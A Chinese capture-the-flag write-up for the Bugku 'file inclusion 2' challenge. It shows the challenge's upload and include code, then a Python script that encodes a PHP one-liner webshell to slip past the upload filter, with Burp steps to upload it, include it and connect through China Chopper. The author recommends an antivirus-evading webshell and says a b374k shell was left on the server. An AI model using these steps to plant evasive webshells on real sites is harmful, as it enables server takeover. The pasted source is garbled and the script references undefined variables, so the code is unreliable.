Bugku 文件包含2 writeup 绕过过滤

首先附上网站源码http://123.206.31.85:49166/

index.php

=70)
        {
            echo "
NAIVE!!!
";
        }
        else
        {
            include($file);
        }
    }
?>

upload.php

    
    
    
    

file:


请上传jpg gif png 格式的文件  文件大小不能超过100KiB

/i', '_', $content);
        file_put_contents('upload/'.$filename, $content);
        echo "file upload successful!Save in:  " . "upload/" . $filename;

	}else{
        	echo "upload failed!";
	}
    }
    else
    {
        echo "upload failed! allow only jpg,png,gif,jpep";
    }
}
?>

看到源码小伙伴已改知道该如何绕过加上漏洞利用了吧

我直接附上python3脚本

hah  = ""#这里还自己想要的一句话，最好是免杀的
weizhi='666.php'#设置文件名
print(len(hah))
k=""
for i in hah:
    k=k+"%c"
    j=j+str(ord(i))+','
j = j[:-1]
k=k+'\".\'\"\'.\",'
print(k+j+l)

接下来我们到cmd里运行

我们复制下来先存起来，接下来所怎么用

到upload.php随便传个图片用burp拦截下

随便传个图片扔到repeater里

把红色内容换成我们刚才用脚本跑出来的这段，然后发出去，看黄色那个接下来我们包含下

什么都没跳，说明成功了

一句话已经种上去了，接下来上菜刀就行了。

有其他更骚的种马思路求交流学习：企ii鹅1065705433 b374k留上面了有需要自己拿了玩哈